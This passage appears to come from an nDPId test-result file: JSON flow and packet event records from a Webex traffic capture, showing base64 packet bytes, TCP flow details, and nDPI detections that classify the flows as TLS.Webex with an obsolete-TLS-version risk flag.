C1jaXNjby1zZXJ2aWNldXJpDQpVc2VyLUFnZW50OiBab2lwZXIgcjMzNjg4DQpBbGxvdy1FdmVudHM6IHByZXNlbmNlLCBrcG1sDQpDb250ZW50LUxlbmd0aDogMA0KDQo="} -00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":461,"source":"webex.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570640269,"flow_last_seen":1444570640269,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570640269,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.202.139","src_port":47135,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":461,"source":"webex.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1444570640269,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570640269,"pkt":"ABoRAAACABoRAAABCABFAAA8fMBAAEAGd0oKCAABch3Ki7gfAbudV783AAAAAKACOQjtmQAAAgQFtAQCCAoATMP3AAAAAAEDAwY="} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":462,"source":"webex.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1444570640284,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570640284,"pkt":"ABoRAAACABoRAAABCABFAAAoAfNAABAGIixyHcqLCggAAQG7uB9iqEDInVe\/OFAS\/\/+vRQAA"} -00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":463,"source":"webex.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570640284,"flow_last_seen":1444570640284,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570640284,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.213.212","src_port":41757,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":463,"source":"webex.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1444570640284,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570640284,"pkt":"ABoRAAACABoRAAABCABFAAA8nBhAAEAGTKkKCAABch3V1KMdAbtvG1\/vAAAAAKACOQiE1wAAAgQFtAQCCAoATMP3AAAAAAEDAwY="} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":464,"source":"webex.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1444570640298,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570640298,"pkt":"ABoRAAACABoRAAABCABFAAAoAfRAABAGFuJyHdXUCggAAQG7ox2Q5KAQbxtf8FAS\/\/+4\/gAA"} -00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":465,"source":"webex.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570640298,"flow_last_seen":1444570640298,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570640298,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.204.49","src_port":51676,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":465,"source":"webex.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1444570640298,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570640298,"pkt":"ABoRAAACABoRAAABCABFAAA8YQlAAEAGkVsKCAABch3MMcncAbvjbaL+AAAAAKACOQiwWQAAAgQFtAQCCAoATMP3AAAAAAEDAwY="} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":466,"source":"webex.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1444570640309,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570640309,"pkt":"ABoRAAACABoRAAABCABFAAAoAfVAABAGIIRyHcwxCggAAQG7ydwckl0B422i\/1AS\/\/+b4gAA"} -00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":467,"source":"webex.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570640310,"flow_last_seen":1444570640310,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570640310,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.98","src_port":37139,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":467,"source":"webex.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1444570640310,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570640310,"pkt":"ABoRAAACABoRAAABCABFAAA8S45AAEAGO38KCAABQERpYpETAbtLyIh5AAAAAKACOQgv9gAAAgQFtAQCCAoATMP3AAAAAAEDAwY="} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":468,"source":"webex.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1444570640319,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570640319,"pkt":"ABoRAAACABoRAAABCABFAAAoAfZAABAGtStARGliCggAAQG7kRO0N3eGS8iIelAS\/\/9pVAAA"} -00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":469,"source":"webex.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570640319,"flow_last_seen":1444570640319,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570640319,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41394,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":469,"source":"webex.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1444570640319,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570640319,"pkt":"ABoRAAACABoRAAABCABFAAA8c3VAAEAGE5MKCAABQERpZ6GyAbtpybCOAAAAAKACOQjZNwAAAgQFtAQCCAoATMP7AAAAAAEDAwY="} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":470,"source":"webex.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1444570640330,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570640330,"pkt":"ABoRAAACABoRAAABCABFAAAoAfdAABAGtSVARGlnCggAAQG7obKWNk9xacmwj1AS\/\/9YsAAA"} -00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":471,"source":"webex.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570640330,"flow_last_seen":1444570640330,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570640330,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51134,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":471,"source":"webex.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1444570640330,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570640330,"pkt":"ABoRAAACABoRAAABCABFAAA8tGhAAEAGXWUKCAABPm3geMe+AbssX3BwAAAAAKACOQi7XAAAAgQFtAQCCAoATMQYAAAAAAEDAwY="} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":472,"source":"webex.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1444570640338,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570640338,"pkt":"ABoRAAACABoRAAABCABFAAAoAfhAABAGP+o+beB4CggAAQG7x77ToI+PLF9wcVAS\/\/+9aQAA"} -00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":473,"source":"webex.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570640338,"flow_last_seen":1444570640338,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570640338,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51135,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":473,"source":"webex.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1444570640338,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570640338,"pkt":"ABoRAAACABoRAAABCABFAAA82ZNAAEAGODoKCAABPm3geMe\/Abvolh2LAAAAAKACOQhSCQAAAgQFtAQCCAoATMQYAAAAAAEDAwY="} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":474,"source":"webex.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1444570640344,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570640344,"pkt":"ABoRAAACABoRAAABCABFAAAoAflAABAGP+k+beB4CggAAQG7x78XaeJ06JYdjFAS\/\/+9aAAA"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":484,"source":"webex.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570640346,"flow_last_seen":1444570640346,"flow_idle_time":7440000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":23,"flow_avg_l4_payload_len":23,"midstream":1,"thread_ts_msec":1444570640346,"l3_proto":"ip4","src_ip":"10.133.206.47","dst_ip":"80.74.110.68","src_port":33459,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":484,"source":"webex.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1444570640346,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1444570640346,"pkt":"ABoRAAACABoRAAABCABFAABLP\/ZAAEAGY3QKhc4vUEpuRIKzAbsvtI0Fj3ahWYAYAWE\/AgAAAQEICgBMxFRXHeViFQMBABJ8gv9dmaTjHFUtA85jnlaY0C8="} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":485,"source":"webex.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1444570640347,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1444570640347,"pkt":"ABoRAAACABoRAAABCABFAAA0P\/dAAEAGY4oKhc4vUEpuRIKzAbsvtI0cj3ahWYARAWFq6AAAAQEICgBMxFRXHeVi"} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":486,"source":"webex.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":3,"flow_last_seen":1444570640347,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570640347,"pkt":"ABoRAAACABoRAAABCABFAAAoAfpAABAG0ZNQSm5ECoXOLwG7grOPdqFZL7SNHVAQ\/\/+mgQAA"} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":488,"source":"webex.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1444570640348,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570640348,"pkt":"ABoRAAACABoRAAABCABFAAA8fMFAAEAGd0kKCAABch3Ki7gfAbudV783AAAAAKACOQjtNQAAAgQFtAQCCAoATMRbAAAAAAEDAwY="} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":490,"source":"webex.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":3,"flow_last_seen":1444570640356,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570640356,"pkt":"ABoRAAACABoRAAABCABFAAA8nBlAAEAGTKgKCAABch3V1KMdAbtvG1\/vAAAAAKACOQiEcwAAAgQFtAQCCAoATMRbAAAAAAEDAwY="} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":492,"source":"webex.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1444570640365,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570640365,"pkt":"ABoRAAACABoRAAABCABFAAA8YQpAAEAGkVoKCAABch3MMcncAbvjbaL+AAAAAKACOQiv9QAAAgQFtAQCCAoATMRbAAAAAAEDAwY="} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":494,"source":"webex.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":1444570640373,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570640373,"pkt":"ABoRAAACABoRAAABCABFAAA8S49AAEAGO34KCAABQERpYpETAbtLyIh5AAAAAKACOQgvkgAAAgQFtAQCCAoATMRbAAAAAAEDAwY="} -00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":496,"source":"webex.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570640382,"flow_last_seen":1444570640382,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570640382,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33511,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":496,"source":"webex.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1444570640382,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570640382,"pkt":"ABoRAAACABoRAAABCABFAAA8O9hAAEAGNk0KCAABUEpuRILnAbv7u\/+DAAAAAKACOQgB2AAAAgQFtAQCCAoATMRbAAAAAAEDAwY="} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":497,"source":"webex.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":1444570640385,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570640385,"pkt":"ABoRAAACABoRAAABCABFAAAoAgBAABAGoDlQSm5ECggAAQG7gucERAB8+7v\/hFAS\/\/9imAAA"} -00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":498,"source":"webex.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570640385,"flow_last_seen":1444570640385,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570640385,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33512,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":498,"source":"webex.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1444570640385,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570640385,"pkt":"ABoRAAACABoRAAABCABFAAA8smJAAEAGv8IKCAABUEpuRILoAbtZhnY\/AAAAAKACOQgtTwAAAgQFtAQCCAoATMRdAAAAAAEDAwY="} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":499,"source":"webex.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1444570640389,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570640389,"pkt":"ABoRAAACABoRAAABCABFAAAoAgFAABAGoDhQSm5ECggAAQG7guimeYnAWYZ2QFAS\/\/9ilwAA"} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":500,"source":"webex.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":1444570640389,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570640389,"pkt":"ABoRAAACABoRAAABCABFAAA8c3ZAAEAGE5IKCAABQERpZ6GyAbtpybCOAAAAAKACOQjY0wAAAgQFtAQCCAoATMRfAAAAAAEDAwY="} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":502,"source":"webex.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":3,"flow_last_seen":1444570640395,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570640395,"pkt":"ABoRAAACABoRAAABCABFAAA8tGlAAEAGXWQKCAABPm3geMe+AbssX3BwAAAAAKACOQi6+AAAAgQFtAQCCAoATMR8AAAAAAEDAwY="} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":504,"source":"webex.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":3,"flow_last_seen":1444570640399,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570640399,"pkt":"ABoRAAACABoRAAABCABFAAA82ZRAAEAGODkKCAABPm3geMe\/Abvolh2LAAAAAKACOQhRpAAAAgQFtAQCCAoATMR9AAAAAAEDAwY="} -00940{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":509,"source":"webex.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570640269,"flow_last_seen":1444570640404,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1444570640404,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.202.139","src_port":47135,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00940{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":512,"source":"webex.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570640284,"flow_last_seen":1444570640404,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1444570640404,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.213.212","src_port":41757,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00939{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":515,"source":"webex.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570640298,"flow_last_seen":1444570640404,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1444570640404,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.204.49","src_port":51676,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00938{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":518,"source":"webex.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570640310,"flow_last_seen":1444570640405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1444570640405,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.98","src_port":37139,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00939{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":521,"source":"webex.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570640319,"flow_last_seen":1444570640406,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1444570640406,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41394,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00940{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":524,"source":"webex.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570640330,"flow_last_seen":1444570640406,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1444570640406,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51134,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00940{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":527,"source":"webex.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570640338,"flow_last_seen":1444570640407,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1444570640407,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51135,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": 